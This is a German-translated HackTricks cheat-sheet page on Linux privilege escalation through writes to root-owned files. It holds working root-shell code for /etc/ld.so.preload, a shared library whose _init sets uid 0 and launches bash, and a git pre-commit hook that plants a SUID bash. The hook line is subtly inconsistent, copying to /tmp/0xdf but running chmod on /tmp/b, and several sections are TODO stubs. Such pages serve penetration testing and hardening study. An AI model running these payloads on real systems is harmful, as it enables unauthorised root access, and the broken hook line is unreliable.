hacktricks/linux-hardening/privilege-escalation/write-to-root.md

2.9 KiB

Beliebiges Schreiben in die Root-Datei

Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

/etc/ld.so.preload

Diese Datei verhält sich wie die LD_PRELOAD Umgebungsvariable, funktioniert aber auch in SUID-Binärdateien.
Wenn Sie sie erstellen oder ändern können, können Sie einfach einen Pfad zu einer Bibliothek hinzufügen, die mit jeder ausgeführten Binärdatei geladen wird.

Zum Beispiel: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git Hooks

Git Hooks sind Skripte, die bei verschiedenen Ereignissen in einem Git-Repository ausgeführt werden, z. B. wenn ein Commit erstellt wird, ein Merge... Wenn also ein privilegiertes Skript oder Benutzer diese Aktionen häufig ausführt und es möglich ist, im .git-Ordner zu schreiben, kann dies zur Privilege Escalation verwendet werden.

Zum Beispiel ist es möglich, ein Skript in einem Git-Repository im .git/hooks zu generieren, damit es immer ausgeführt wird, wenn ein neuer Commit erstellt wird:

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Cron & Zeitdateien

TODO

Service- & Socketdateien

TODO

binfmt_misc

Die Datei in /proc/sys/fs/binfmt_misc gibt an, welche Binärdatei welche Art von Dateien ausführen soll. TODO: Überprüfen Sie die Anforderungen, um dies auszunutzen und eine Reverse-Shell auszuführen, wenn ein gängiger Dateityp geöffnet wird.